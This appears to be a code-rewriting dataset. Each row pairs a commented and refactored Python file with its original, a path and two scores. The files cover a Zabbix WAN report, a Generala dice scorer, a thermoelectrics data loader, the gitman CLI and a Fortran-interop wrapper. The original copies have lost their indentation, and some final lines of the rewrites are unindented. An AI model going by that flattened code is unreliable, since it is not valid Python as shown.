            return_var=asr.VariableOld(
                name="c_desc1_int32",
                type=asr.Derived(name="c_desc1_t")
            ),
            module = "gfort_interop"
        )
        c_desc2 = scope_add_function(
            symtab,
            "c_desc2_int32",
            args=[
                asr.VariableOld(
                    name="A",
                    intent="in",
                    type=type2
                )
            ],
            return_var=asr.VariableOld(
                name="c_desc2_int32",
                type=asr.Derived(name="c_desc2_t")
            ),
            module = "gfort_interop"
        )
        for arg in node.args:
            type = self.visit(arg.type)
            if array_is_assumed_shape(type):
                # Assumed-shape arrays cross the C boundary as descriptor
                # structs; wrap the argument in the matching constructor call.
                if len(type.dims) == 1:
                    dname = "c_desc1_t"
                    fname = c_desc1
                elif len(type.dims) == 2:
                    dname = "c_desc2_t"
                    fname = c_desc2
                else:
                    raise NotImplementedError("Too many dimensions")
                type = asr.Derived(name=dname, module="gfort_interop")
                args2.append(asr.FuncCall(func=fname, args=[arg],
                    keywords=[], type=type))
            else:
                args2.append(arg)
            cargs.append(asr.VariableOld(
                name=arg.name,
                intent=arg.intent,
                type=type,
            ))
        # Declare the bind(c) companion and make the wrapper's body a single
        # assignment: r = <name>_c_wrapper(...).
        fw = scope_add_function(symtab, cname, args=cargs, return_var=cname)
        fw.bind = bind
        body = [
            asr.Assignment(return_var,
                asr.FuncCall(func=fw, args=args2, keywords=[],
                    type=fw.return_var.type)
            )
        ]
        f.body = body
        return f
def create_wrapper(u):
    """Build the C-interop wrapper module for translation unit *u* and
    verify the resulting ASR before returning it."""
    wrapped = WrapperVisitor().visit(u)
    verify_asr(wrapped)
    return wrapped
# Load a gfortran module file, convert ASR -> AST -> source, then build the
# wrapper module and render it as well; the final print follows below.
u = mod_to_asr("mod1.mod")
a = asr_to_ast(u)
s = ast_to_src(a)
#print(s)
u2 = create_wrapper(u)
a = asr_to_ast(u2)
s = ast_to_src(a)
#print("-"*80)
print(s) | 0.251188 | 0.201165 |
import time
import csv
import codecs
import HTML
from zabbix.api import ZabbixAPI
from datetime import timedelta
from datetime import datetime
from itertools import repeat
def zabbix_dane_tabelka(IP):
    """Fetch Zabbix data for a list of interface IPs ("Zabbix table data").

    Resolves each IP to its Zabbix host id, labels the operator ('Netia'
    when the host name contains it, otherwise 'T-Mobile'), and reads the
    latest LAN/Loopback ping item values plus the last-change timestamp of
    the LAN+Loopback outage trigger.

    Returns (hID, dane_z_zabbix): hID[i] is the host id for IP[i], and
    dane_z_zabbix maps 'hostname'/'lan'/'loop'/'last_clock_loop' to dicts
    keyed by host id.
    """
    hID = []
    dane_z_zabbix = {'hostname':{}, 'lan':{}, 'loop':{}, 'last_clock_loop':{}}
    _ = {}
    # NOTE(review): credentials are '***' placeholders -- presumably
    # substituted before deployment; confirm how they are injected.
    zapi = ZabbixAPI(url='https://pit-zabbix.net.pp', user='***', password='***')
    result = zapi.do_request('hostinterface.get', {'filter': {'ip':IP}, 'limit':'100'})
    result = result['result']
    # Pre-size hID so each host id lands at the position of its IP.
    hID.extend(repeat('', len(IP)))
    for i in enumerate(result):
        hID[IP.index(i[1]['ip'])] = i[1]['hostid']
    result = zapi.do_request('host.get', {'filter': {'hostid':hID}, 'limit':'100'})
    result = result['result']
    # Operator classification from the host name.
    for e in enumerate(hID):
        for x in enumerate(hID):
            if result[x[0]].get('hostid', '') == e[1]:
                dane_z_zabbix['hostname'][hID[e[0]]] = 'Netia' if result[x[0]]['name'].find('Netia') != -1 else 'T-Mobile'
                break
    result = zapi.do_request('item.get', {'filter': {'hostid':hID, 'value_type':'3', 'name':['Ping Loopback (ICMP Echo) -{HOST.DNS}', 'Ping LAN (ICMP Echo)','Ping Loopback (ICMP Echo)']}, 'limit':'100'})
    result = result['result']
    # Match each returned item to its host and record the last ping values.
    for e in enumerate(result):
        for x in enumerate(hID):
            if result[e[0]]['hostid'] == x[1] and result[e[0]]['name'] == 'Ping LAN (ICMP Echo)':
                dane_z_zabbix['lan'][x[1]] = result[e[0]].get('lastvalue', '')
                break
            if result[e[0]]['hostid'] == x[1] and ((result[e[0]]['name'] == 'Ping Loopback (ICMP Echo) -{HOST.DNS}') or (result[e[0]]['name'] == 'Ping Loopback (ICMP Echo)')):
                dane_z_zabbix['loop'][x[1]] = result[e[0]].get('lastvalue', -1)
                # Last state change of the "no LAN+Loopback communication" trigger.
                result3 = zapi.do_request('trigger.get', {'filter': {'hostid':x[1], 'description':'OUT,T-DUIiS:Ping-Brak komunikacji z adresem LAN oraz Loopback (5m) -Niezalezny od EJP'}, 'limit':'1'})
                dane_z_zabbix['last_clock_loop'][x[1]] = result3['result'][0].get('lastchange', '')
                break
    del result, result3
    return hID, dane_z_zabbix
def raportWAN():
    """Build ``query.html``: a sortable WAN-incident report enriched with Zabbix data.

    Reads the ServiceDesk export ``query.csv`` (UTF-16-LE), looks up each
    device in Zabbix via :func:`zabbix_dane_tabelka`, and writes the merged
    HTML table to ``query.html``.
    """
    # Load the CSV export: keep columns 0-1 and 5-10 plus 3 blank columns
    # to be filled with Zabbix-derived data.  The file is now closed
    # deterministically (the original leaked the codecs handle).
    temp_table = []
    with codecs.open('query.csv', 'rU', 'utf-16-le') as csv_file:
        for row in csv.reader(csv_file):
            temp_table.append(row[0:2] + row[5:11] + [''] * 3)
    header_temp = temp_table[0][0:8] + ['Operator wg Zabbix',
                                        'Status Zabbix<br>(Lan+Loopback)',
                                        'GSM<br>(Lan vs Loopback)']
    header_temp[1] = 'Data rejestracji<br>Incydentu WAN'
    header_temp[5] = 'Data przekazania<br>zgłoszenia do Netii'
    header_temp[6] = 'Numer zgłoszenia<br>awarii w Netii'
    del temp_table[0]  # drop the CSV header row
    temp_IP = [row[2] for row in temp_table]
    value = zabbix_dane_tabelka(temp_IP)  # (host ids, per-host data dicts)
    for i, t in enumerate(temp_table):
        host_id = value[0][i]
        t[0] = HTML.link(t[0], 'https://servicedesk.net.pp/SD_Operator.WebAccess/wd/search/search.rails?s=' + t[0])
        t[2] = (HTML.link(t[2], 'https://pit-zabbix.net.pp/latest.php?filter_set=1&hostids[]=' + host_id)
                + ' ' + HTML.link('(TR)', 'https://pit-zabbix.net.pp/search.php?search=' + t[2]))
        # Operator name may be missing when the host was not found in Zabbix.
        try:
            t[8] = value[1]['hostname'][host_id]
        except KeyError:
            pass
        # Convert the trigger's last state change exactly once.  The
        # original repeated the int(...) lookup OUTSIDE its try block and
        # crashed with an uncaught KeyError/ValueError when data was absent.
        try:
            last_change = datetime.fromtimestamp(int(value[1]['last_clock_loop'][host_id]))
            temp_czas = last_change.strftime('%Y-%m-%d %H:%M:%S')
            days = (datetime.now() - last_change).days
        except (KeyError, ValueError, TypeError):
            temp_czas = ''
            days = ''
        if value[1]['lan'].get(host_id, '') == '1':
            t[9] = '<font color="green"><b>OK</b><br>(Status od: {})<br><b>{} dni</b></font>'.format(temp_czas, days)
        else:
            t[9] = '<font color="red"><b>DOWN</b><br>(Status od: {})<br><b>{} dni</b></font>'.format(temp_czas, days)
        # Loopback down while LAN answers suggests traffic rides a GSM modem.
        if value[1]['loop'].get(host_id, '') == '0' and value[1]['lan'].get(host_id, '') == '1':
            t[10] = 'Prawdopodobny modem GSM<br>(Loop=Down, LAN=OK)'
    with open('query.html', 'w+', encoding='utf-8') as html_file:
        html_file.write('<script src="sorttable.js"></script>')
        html_file.write('<link type="text/css" rel="stylesheet" href="zab.css">')
        html_file.write('<h1>Plik query.csv załadowano.</h1><h2><br>Import zakończony</h2>')
        html_file.write(HTML.table(temp_table, header_row=header_temp, attribs={'class':'sortable'}))
raportWAN() | trzeci.py | import time
import csv
import codecs
import HTML
from zabbix.api import ZabbixAPI
from datetime import timedelta
from datetime import datetime
from itertools import repeat
def zabbix_dane_tabelka(IP):
hID = []
dane_z_zabbix = {'hostname':{}, 'lan':{}, 'loop':{}, 'last_clock_loop':{}}
_ = {}
zapi = ZabbixAPI(url='https://pit-zabbix.net.pp', user='***', password='***')
result = zapi.do_request('hostinterface.get', {'filter': {'ip':IP}, 'limit':'100'})
result = result['result']
hID.extend(repeat('', len(IP)))
for i in enumerate(result):
hID[IP.index(i[1]['ip'])] = i[1]['hostid']
result = zapi.do_request('host.get', {'filter': {'hostid':hID}, 'limit':'100'})
result = result['result']
for e in enumerate(hID):
for x in enumerate(hID):
if result[x[0]].get('hostid', '') == e[1]:
dane_z_zabbix['hostname'][hID[e[0]]] = 'Netia' if result[x[0]]['name'].find('Netia') != -1 else 'T-Mobile'
break
result = zapi.do_request('item.get', {'filter': {'hostid':hID, 'value_type':'3', 'name':['Ping Loopback (ICMP Echo) -{HOST.DNS}', 'Ping LAN (ICMP Echo)','Ping Loopback (ICMP Echo)']}, 'limit':'100'})
result = result['result']
for e in enumerate(result):
for x in enumerate(hID):
if result[e[0]]['hostid'] == x[1] and result[e[0]]['name'] == 'Ping LAN (ICMP Echo)':
dane_z_zabbix['lan'][x[1]] = result[e[0]].get('lastvalue', '')
break
if result[e[0]]['hostid'] == x[1] and ((result[e[0]]['name'] == 'Ping Loopback (ICMP Echo) -{HOST.DNS}') or (result[e[0]]['name'] == 'Ping Loopback (ICMP Echo)')):
dane_z_zabbix['loop'][x[1]] = result[e[0]].get('lastvalue', -1)
result3 = zapi.do_request('trigger.get', {'filter': {'hostid':x[1], 'description':'OUT,T-DUIiS:Ping-Brak komunikacji z adresem LAN oraz Loopback (5m) -Niezalezny od EJP'}, 'limit':'1'})
dane_z_zabbix['last_clock_loop'][x[1]] = result3['result'][0].get('lastchange', '')
break
del result, result3
return hID, dane_z_zabbix
def raportWAN():
reader = csv.reader(codecs.open('query.csv', 'rU', 'utf-16-le'))
header_temp, temp_table = [], []
for row in iter(reader):
temp_table.append(row[0:2] + row[5:11] + ['']*3)
del reader
header_temp=temp_table[0][0:8] + ['Operator wg Zabbix', 'Status Zabbix<br>(Lan+Loopback)', 'GSM<br>(Lan vs Loopback)']
header_temp[1] = 'Data rejestracji<br>Incydentu WAN'
header_temp[5] = 'Data przekazania<br>zgłoszenia do Netii'
header_temp[6] = 'Numer zgłoszenia<br>awarii w Netii'
del temp_table[0]
temp_czas = ''
temp_IP = [temp_table[i[0]][2] for i in enumerate(temp_table)]
value = zabbix_dane_tabelka(temp_IP)
for i, t in enumerate(temp_table):
t[0] = HTML.link(t[0], 'https://servicedesk.net.pp/SD_Operator.WebAccess/wd/search/search.rails?s=' + t[0])
t[2] = HTML.link(t[2], 'https://pit-zabbix.net.pp/latest.php?filter_set=1&hostids[]=' + value[0][i]) + ' ' + HTML.link('(TR)', 'https://pit-zabbix.net.pp/search.php?search=' + t[2])
try:
t[8] = value[1]['hostname'][value[0][i]]
except:
pass
try:
temp_czas = datetime.fromtimestamp(int(value[1]['last_clock_loop'][value[0][i]])).strftime('%Y-%m-%d %H:%M:%S')
except:
temp_czas = ''
pass
delta = datetime.now() - datetime.fromtimestamp(int(value[1]['last_clock_loop'][value[0][i]]))
if value[1]['lan'].get(value[0][i], '') == '1':
t[9] = '<font color="green"><b>OK</b><br>(Status od: {})<br><b>{} dni</b></font>'.format(temp_czas, delta.days)
else:
t[9] = '<font color="red"><b>DOWN</b><br>(Status od: {})<br><b>{} dni</b></font>'.format(temp_czas, delta.days)
if value[1]['loop'].get(value[0][i], '') == '0' and value[1]['lan'].get(value[0][i], '') == '1':
t[10] = 'Prawdopodobny modem GSM<br>(Loop=Down, LAN=OK)'
with open('query.html', 'w+', encoding='utf-8') as html_file:
html_file.write('<script src="sorttable.js"></script>')
html_file.write('<link type="text/css" rel="stylesheet" href="zab.css">')
html_file.write('<h1>Plik query.csv załadowano.</h1><h2><br>Import zakończony</h2>')
html_file.write(HTML.table(temp_table, header_row=header_temp, attribs={'class':'sortable'}))
raportWAN() | 0.136522 | 0.19112 |
import abc
import math
from generala import Category
class Number(Category):
    """Category for a single die face: scores face value times its count."""
    def __init__(self, n):
        self._n = n
    def score(self, counts, roll, open_categories):
        # counts is indexed by face-1; pay n points per die showing n.
        return counts[self._n - 1] * self._n
    def __str__(self):
        return "{}s".format(self._n)
class MajorHand(Category):
    """Base class for the fixed-score hands (straight, full house, ...).

    Every major hand pays a fixed score, plus a bonus when made on the
    first roll.  That payout rule was copy-pasted in all five subclasses;
    it now lives once in :meth:`_award`.
    """
    def __init__(self, score, first_roll_bonus):
        self._score = score
        self._first_roll_bonus = first_roll_bonus
    def _award(self, roll):
        # Shared payout: base score, plus the first-roll bonus on roll 1.
        if roll == 1:
            return self._score + self._first_roll_bonus
        return self._score
class Straight(MajorHand):
    def score(self, counts, roll, open_categories):
        # One die of each face: either 2-3-4-5-6 or 1-2-3-4-5.
        if counts == (0,1,1,1,1,1) or counts == (1,1,1,1,1,0):
            return self._award(roll)
        return 0
    def __str__(self):
        return "Straight"
class FullHouse(MajorHand):
    def score(self, counts, roll, open_categories):
        if 3 in counts and 2 in counts:
            return self._award(roll)
        return 0
    def __str__(self):
        return "Full house"
class FourOfAKind(MajorHand):
    def score(self, counts, roll, open_categories):
        if 4 in counts:
            return self._award(roll)
        return 0
    def __str__(self):
        return "Four of a kind"
class Generala(MajorHand):
    def score(self, counts, roll, open_categories):
        if 5 in counts:
            return self._award(roll)
        return 0
    def __str__(self):
        return "Generala"
class DoubleGenerala(MajorHand):
    def __init__(self, score, first_roll_bonus, generala):
        super().__init__(score, first_roll_bonus)
        self._generala = generala
    def score(self, counts, roll, open_categories):
        # Only scores once the plain Generala is no longer open.
        if self._generala not in open_categories and 5 in counts:
            return self._award(roll)
        return 0
    def __str__(self):
        return "Double Generala"
# One scoring category per die face (1s through 6s), plus named aliases.
numbers = tuple(Number(n) for n in range(1,7))
ones, twos, threes, fours, fives, sixes = numbers
# Major hands with their base scores and first-roll bonuses.  The bonus is
# math.inf for the Generala variants — presumably a first-roll Generala
# wins outright; confirm against the game rules.
straight = Straight(score=30, first_roll_bonus=10)
full_house = FullHouse(score=50, first_roll_bonus=10)
four_of_a_kind = FourOfAKind(score=80, first_roll_bonus=10)
generala = Generala(score=100, first_roll_bonus=math.inf)
double_generala = DoubleGenerala(score=200, first_roll_bonus=math.inf, generala=generala)
all_categories = (*numbers, straight, full_house, four_of_a_kind, generala, double_generala)
class MaxScore(Category):
    """Virtual category reporting the best score attainable among *categories*."""
    def __init__(self, categories):
        self._categories = categories
    def score(self, counts, roll, open_categories):
        # Best score across the wrapped categories for this dice state.
        return max(cat.score(counts, roll, open_categories) for cat in self._categories)
    def __str__(self):
return "any" | generala/categories.py | import abc
import math
from generala import Category
class Number(Category):
def __init__(self, n):
self._n = n
def score(self, counts, roll, open_categories):
return self._n * counts[self._n-1]
def __str__(self):
return "{}s".format(self._n)
class MajorHand(Category):
def __init__(self, score, first_roll_bonus):
self._score = score
self._first_roll_bonus = first_roll_bonus
class Straight(MajorHand):
def score(self, counts, roll, open_categories):
if counts == (0,1,1,1,1,1) or counts == (1,1,1,1,1,0):
if roll == 1:
return self._score + self._first_roll_bonus
return self._score
return 0
def __str__(self):
return "Straight"
class FullHouse(MajorHand):
def score(self, counts, roll, open_categories):
if 3 in counts and 2 in counts:
if roll == 1:
return self._score + self._first_roll_bonus
return self._score
return 0
def __str__(self):
return "Full house"
class FourOfAKind(MajorHand):
def score(self, counts, roll, open_categories):
if 4 in counts:
if roll == 1:
return self._score + self._first_roll_bonus
return self._score
return 0
def __str__(self):
return "Four of a kind"
class Generala(MajorHand):
def score(self, counts, roll, open_categories):
if 5 in counts:
if roll == 1:
return self._score + self._first_roll_bonus
return self._score
return 0
def __str__(self):
return "Generala"
class DoubleGenerala(MajorHand):
def __init__(self, score, first_roll_bonus, generala):
super().__init__(score, first_roll_bonus)
self._generala = generala
def score(self, counts, roll, open_categories):
if self._generala not in open_categories and 5 in counts:
if roll == 1:
return self._score + self._first_roll_bonus
return self._score
return 0
def __str__(self):
return "Double Generala"
numbers = tuple(Number(n) for n in range(1,7))
ones, twos, threes, fours, fives, sixes = numbers
straight = Straight(score=30, first_roll_bonus=10)
full_house = FullHouse(score=50, first_roll_bonus=10)
four_of_a_kind = FourOfAKind(score=80, first_roll_bonus=10)
generala = Generala(score=100, first_roll_bonus=math.inf)
double_generala = DoubleGenerala(score=200, first_roll_bonus=math.inf, generala=generala)
all_categories = (*numbers, straight, full_house, four_of_a_kind, generala, double_generala)
class MaxScore(Category):
def __init__(self, categories):
self._categories = categories
def score(self, counts, roll, open_categories):
return max(cat.score(counts, roll, open_categories) for cat in self._categories)
def __str__(self):
return "any" | 0.718496 | 0.243991 |
from pandas import DataFrame, read_csv
from thermo.utils import ROOT
def to_type(df: DataFrame, dtype: str = "float32") -> DataFrame:
    """Cast every non-string column of *df* to *dtype*.

    Object (string) columns are left untouched.  The result holds the
    converted numeric columns first, then the object columns (joined on
    the index).
    """
    converted = df.select_dtypes(exclude=[object]).astype(dtype)
    strings = df.select_dtypes(include=[object])
    return converted.join(strings)
def load_gaultois(
    target_cols: tuple = ("rho", "seebeck", "kappa", "zT"), drop_outliers=False
) -> tuple[DataFrame, DataFrame]:
    """Load Magpie features and targets of the hand-curated
    Gaultois thermoelectrics database.

    Label units (in /data/gaultois_targets.csv):
    - electrical resistivity (rho): Ohm * meter
    - Seebeck coefficient (S): Volts / Kelvin
    - thermal conductivity (kappa): Watts / (meter * Kelvin)
    - thermoelectric figure of merit (zT): dimensionless

    Args:
        target_cols (sequence, optional): Which targets to load.  The
            default is a tuple (not a list) to avoid the shared
            mutable-default pitfall; any sequence of column names works.
            Defaults to ("rho", "seebeck", "kappa", "zT").
        drop_outliers (bool, optional): Drop rows flagged in the
            'outliers' column. Defaults to False.

    Returns:
        tuple: 2 dataframes for features and targets
    """
    features = read_csv(ROOT + "/data/gaultois_magpie_features.csv").drop(
        columns=["formula"]
    )
    targets = read_csv(
        ROOT + "/data/gaultois_targets.csv",
        header=1,
        na_values="",  # only consider empty string as missing value
        keep_default_na=False,  # no longer consider NaN as missing
    )
    if drop_outliers:
        features = features[targets.outliers.isna()]
        targets = targets[targets.outliers.isna()]
    if target_cols:
        # list(...) so tuples and lists both select columns (a bare tuple
        # would be treated as a single column key by pandas).
        targets = targets[list(target_cols)]
    return to_type(features), to_type(targets)
def load_screen() -> tuple[DataFrame, DataFrame]:
    """Load material candidates into a dataframe for screening. Available columns
    are formula, database ID and MagPie features for over 80,000 compositions pulled
    from COD and ICSD.

    Returns:
        tuple: (formulas, features) dataframes aligned by row.
    """
    features = read_csv(ROOT + "/data/screen_set_magpie_features.csv")
    # Treat only the empty string as missing so sodium amide ("NaN") keeps
    # its formula instead of parsing as not-a-number.  (A previous comment
    # mentioned na_filter=False, but the code uses na_values/keep_default_na.)
    formulas = read_csv(
        ROOT + "/data/screen_formulas.csv",
        comment="#",
        na_values="",  # only consider empty string as missing value
        keep_default_na=False,  # no longer consider NaN as missing
    )
return formulas, features | thermo/data/load.py | from pandas import DataFrame, read_csv
from thermo.utils import ROOT
def to_type(df: DataFrame, dtype: str = "float32") -> DataFrame:
"""Convert all non-string columns to a different data type.
E.g. float64 and int to float32.
"""
df_not_str = df.select_dtypes(exclude=[object]).astype(dtype)
df_str = df.select_dtypes(include=[object])
return df_not_str.join(df_str)
def load_gaultois(
target_cols: list = ["rho", "seebeck", "kappa", "zT"], drop_outliers=False
) -> tuple[DataFrame, DataFrame]:
"""Load Magpie features and targets of the hand-curated
Gaultois thermoelectrics database.
Label units (in /data/gaultois_targets.csv):
- electrical resistivity (rho): Ohm * meter
- Seebeck coefficient (S): Volts / Kelvin
- thermal conductivity (kappa): Watts / (meter * Kelvin)
- thermoelectric figure of merit (zT): dimensionless
Args:
target_cols (list, optional): Which targets to load.
Defaults to ["rho", "seebeck", "kappa", "zT"].
Returns:
tuple: 2 dataframes for features and targets
"""
features = read_csv(ROOT + "/data/gaultois_magpie_features.csv").drop(
columns=["formula"]
)
targets = read_csv(
ROOT + "/data/gaultois_targets.csv",
header=1,
na_values="", # only consider empty string as missing value
keep_default_na=False, # no longer consider NaN as missing
)
if drop_outliers:
features = features[targets.outliers.isna()]
targets = targets[targets.outliers.isna()]
if target_cols:
targets = targets[target_cols]
return to_type(features), to_type(targets)
def load_screen() -> tuple[DataFrame, DataFrame]:
"""Load material candidates into a dataframe for screening. Available columns
are formula, database ID and MagPie features for over 80,000 compositions pulled
from COD and ICSD.
"""
features = read_csv(ROOT + "/data/screen_set_magpie_features.csv")
# na_filter=False prevents sodium amide (NaN) from being parsed as 'not a number'
formulas = read_csv(
ROOT + "/data/screen_formulas.csv",
comment="#",
na_values="", # only consider empty string as missing value
keep_default_na=False, # no longer consider NaN as missing
)
return formulas, features | 0.90904 | 0.613989 |
import sys
import argparse
import logging
from . import CLI, VERSION, DESCRIPTION
from . import common, exceptions, commands
log = logging.getLogger(__name__)
def main(args=None, function=None): # pylint: disable=too-many-statements
    """Process command-line arguments and run the program.

    Args:
        args: argument list to parse; defaults to ``sys.argv[1:]``.
        function: command callable to run directly; when ``None`` it is
            derived from the parsed sub-command by ``_get_command``.

    Exits with status 1 when no command was given or the command failed.
    """
    # Shared options: parent parsers reused by several sub-parsers below.
    debug = argparse.ArgumentParser(add_help=False)
    debug.add_argument('-V', '--version', action='version', version=VERSION)
    group = debug.add_mutually_exclusive_group()
    group.add_argument('-v', '--verbose', action='count', default=0,
                       help="enable verbose logging")
    group.add_argument('-q', '--quiet', action='store_const', const=-1,
                       dest='verbose', help="only display errors and prompts")
    project = argparse.ArgumentParser(add_help=False)
    project.add_argument('-r', '--root', metavar='PATH',
                         help="root directory of the project")
    depth = argparse.ArgumentParser(add_help=False)
    depth.add_argument('-d', '--depth', type=common.positive_int,
                       default=5, metavar="NUM",
                       help="limit the number of dependency levels")
    options = argparse.ArgumentParser(add_help=False)
    options.add_argument('-f', '--force', action='store_true',
                         help="overwrite uncommitted changes in dependencies")
    options.add_argument('-c', '--clean', action='store_true',
                         help="delete ignored files in dependencies")
    shared = {'formatter_class': common.WideHelpFormatter}
    # Main parser
    parser = argparse.ArgumentParser(prog=CLI, description=DESCRIPTION,
                                     parents=[debug], **shared)
    subs = parser.add_subparsers(help="", dest='command', metavar="<command>")
    # Init parser
    info = "create a new config file for the project"
    sub = subs.add_parser('init', description=info.capitalize() + '.',
                          help=info, parents=[debug], **shared)
    # Install parser
    info = "get the specified versions of all dependencies"
    sub = subs.add_parser('install', description=info.capitalize() + '.',
                          help=info, parents=[debug, project, depth, options],
                          **shared)
    sub.add_argument('name', nargs='*',
                     help="list of dependencies names to install")
    sub.add_argument('-e', '--fetch', action='store_true',
                     help="always fetch the latest branches")
    # Update parser
    info = "update dependencies to the latest versions"
    sub = subs.add_parser('update', description=info.capitalize() + '.',
                          help=info, parents=[debug, project, depth, options],
                          **shared)
    sub.add_argument('name', nargs='*',
                     help="list of dependencies names to update")
    sub.add_argument('-a', '--all', action='store_true', dest='recurse',
                     help="also update all nested dependencies")
    sub.add_argument('-L', '--skip-lock',
                     action='store_false', dest='lock', default=None,
                     help="disable recording of updated versions")
    # List parser
    info = "display the current version of each dependency"
    sub = subs.add_parser('list', description=info.capitalize() + '.',
                          help=info, parents=[debug, project, depth], **shared)
    sub.add_argument('-D', '--fail-if-dirty', action='store_false',
                     dest='allow_dirty',
                     help="fail if a source has uncommitted changes")
    # Lock parser
    info = "lock the current version of each dependency"
    sub = subs.add_parser('lock', description=info.capitalize() + '.',
                          help=info, parents=[debug, project], **shared)
    sub.add_argument('name', nargs='*',
                     help="list of dependency names to lock")
    # Uninstall parser
    info = "delete all installed dependencies"
    sub = subs.add_parser('uninstall', description=info.capitalize() + '.',
                          help=info, parents=[debug, project], **shared)
    sub.add_argument('-f', '--force', action='store_true',
                     help="delete uncommitted changes in dependencies")
    sub.add_argument('-k', '--keep-location', dest='keep_location', default=False,
                     action='store_true', help="keep top level folder location")
    # Show parser
    info = "display the path of a dependency or internal file"
    sub = subs.add_parser('show', description=info.capitalize() + '.',
                          help=info, parents=[debug, project], **shared)
    sub.add_argument('name', nargs='*',
                     help="display the path of this dependency")
    sub.add_argument('-c', '--config', action='store_true',
                     help="display the path of the config file")
    sub.add_argument('-l', '--log', action='store_true',
                     help="display the path of the log file")
    # Edit parser
    info = "open the config file in the default editor"
    sub = subs.add_parser('edit', description=info.capitalize() + '.',
                          help=info, parents=[debug, project], **shared)
    # Parse arguments
    namespace = parser.parse_args(args=args)
    # Configure logging
    common.configure_logging(namespace.verbose)
    # Run the program: map the namespace to a callable, or print help.
    function, args, kwargs = _get_command(function, namespace)
    if function:
        _run_command(function, args, kwargs)
    else:
        parser.print_help()
        sys.exit(1)
def _get_command(function, namespace): # pylint: disable=too-many-statements
    """Translate a parsed namespace into ``(function, args, kwargs)``.

    Returns the command callable (or the *function* passed in, unchanged,
    when the namespace holds no recognized command), the positional
    arguments, and the keyword arguments to call it with.
    """
    args = []
    kwargs = {}
    if namespace.command == 'init':
        function = commands.init
    elif namespace.command in ['install', 'update']:
        function = getattr(commands, namespace.command)
        args = namespace.name
        kwargs.update(root=namespace.root,
                      depth=namespace.depth,
                      force=namespace.force,
                      clean=namespace.clean)
        if namespace.command == 'install':
            kwargs.update(fetch=namespace.fetch)
        if namespace.command == 'update':
            kwargs.update(recurse=namespace.recurse,
                          lock=namespace.lock)
    elif namespace.command == 'list':
        function = commands.display
        kwargs.update(root=namespace.root,
                      depth=namespace.depth,
                      allow_dirty=namespace.allow_dirty)
    elif namespace.command == 'lock':
        function = getattr(commands, namespace.command)
        args = namespace.name
        kwargs.update(root=namespace.root)
    elif namespace.command == 'uninstall':
        function = commands.delete
        kwargs.update(root=namespace.root,
                      force=namespace.force,
                      keep_location=namespace.keep_location)
    elif namespace.command == 'show':
        function = commands.show
        args = namespace.name
        kwargs.update(root=namespace.root)
        # Sentinel names understood by commands.show for internal paths.
        if namespace.config:
            args.append('__config__')
        if namespace.log:
            args.append('__log__')
    elif namespace.command == 'edit':
        function = commands.edit
        kwargs.update(root=namespace.root)
    return function, args, kwargs
def _run_command(function, args, kwargs):
    """Invoke a command callable, translating known failures into exit codes.

    Success is the command's truthy return value; the process exits with
    status 1 on failure or on the handled exception types below.
    """
    success = False
    exit_message = None
    try:
        log.debug("Running %s command...", getattr(function, '__name__', 'a'))
        success = function(*args, **kwargs)
    except KeyboardInterrupt:
        log.debug("Command canceled")
    except exceptions.UncommittedChanges as exception:
        _show_error(exception)
        exit_message = "Run again with '--force' to discard changes"
    except exceptions.ScriptFailure as exception:
        _show_error(exception)
        exit_message = "Run again with '--force' to ignore script errors"
    finally:
        # Hint shown after the error details, regardless of exception type.
        if exit_message:
            common.show(exit_message, color='message')
            common.newline()
    if success:
        log.debug("Command succeeded")
    else:
        log.debug("Command failed")
        sys.exit(1)
def _show_error(exception):
    """Print *exception* to the console in the error color, padded by blank lines."""
    # TODO: require level=, evaluate all calls to dedent()
    common.dedent(0)
    common.newline()
    common.show(str(exception), color='error')
    common.newline()
if __name__ == '__main__': # pragma: no cover (manual test)
main() | gitman/cli.py | import sys
import argparse
import logging
from . import CLI, VERSION, DESCRIPTION
from . import common, exceptions, commands
log = logging.getLogger(__name__)
def main(args=None, function=None): # pylint: disable=too-many-statements
"""Process command-line arguments and run the program."""
# Shared options
debug = argparse.ArgumentParser(add_help=False)
debug.add_argument('-V', '--version', action='version', version=VERSION)
group = debug.add_mutually_exclusive_group()
group.add_argument('-v', '--verbose', action='count', default=0,
help="enable verbose logging")
group.add_argument('-q', '--quiet', action='store_const', const=-1,
dest='verbose', help="only display errors and prompts")
project = argparse.ArgumentParser(add_help=False)
project.add_argument('-r', '--root', metavar='PATH',
help="root directory of the project")
depth = argparse.ArgumentParser(add_help=False)
depth.add_argument('-d', '--depth', type=common.positive_int,
default=5, metavar="NUM",
help="limit the number of dependency levels")
options = argparse.ArgumentParser(add_help=False)
options.add_argument('-f', '--force', action='store_true',
help="overwrite uncommitted changes in dependencies")
options.add_argument('-c', '--clean', action='store_true',
help="delete ignored files in dependencies")
shared = {'formatter_class': common.WideHelpFormatter}
# Main parser
parser = argparse.ArgumentParser(prog=CLI, description=DESCRIPTION,
parents=[debug], **shared)
subs = parser.add_subparsers(help="", dest='command', metavar="<command>")
# Init parser
info = "create a new config file for the project"
sub = subs.add_parser('init', description=info.capitalize() + '.',
help=info, parents=[debug], **shared)
# Install parser
info = "get the specified versions of all dependencies"
sub = subs.add_parser('install', description=info.capitalize() + '.',
help=info, parents=[debug, project, depth, options],
**shared)
sub.add_argument('name', nargs='*',
help="list of dependencies names to install")
sub.add_argument('-e', '--fetch', action='store_true',
help="always fetch the latest branches")
# Update parser
info = "update dependencies to the latest versions"
sub = subs.add_parser('update', description=info.capitalize() + '.',
help=info, parents=[debug, project, depth, options],
**shared)
sub.add_argument('name', nargs='*',
help="list of dependencies names to update")
sub.add_argument('-a', '--all', action='store_true', dest='recurse',
help="also update all nested dependencies")
sub.add_argument('-L', '--skip-lock',
action='store_false', dest='lock', default=None,
help="disable recording of updated versions")
# List parser
info = "display the current version of each dependency"
sub = subs.add_parser('list', description=info.capitalize() + '.',
help=info, parents=[debug, project, depth], **shared)
sub.add_argument('-D', '--fail-if-dirty', action='store_false',
dest='allow_dirty',
help="fail if a source has uncommitted changes")
# Lock parser
info = "lock the current version of each dependency"
sub = subs.add_parser('lock', description=info.capitalize() + '.',
help=info, parents=[debug, project], **shared)
sub.add_argument('name', nargs='*',
help="list of dependency names to lock")
# Uninstall parser
info = "delete all installed dependencies"
sub = subs.add_parser('uninstall', description=info.capitalize() + '.',
help=info, parents=[debug, project], **shared)
sub.add_argument('-f', '--force', action='store_true',
help="delete uncommitted changes in dependencies")
sub.add_argument('-k', '--keep-location', dest='keep_location', default=False,
action='store_true', help="keep top level folder location")
# Show parser
info = "display the path of a dependency or internal file"
sub = subs.add_parser('show', description=info.capitalize() + '.',
help=info, parents=[debug, project], **shared)
sub.add_argument('name', nargs='*',
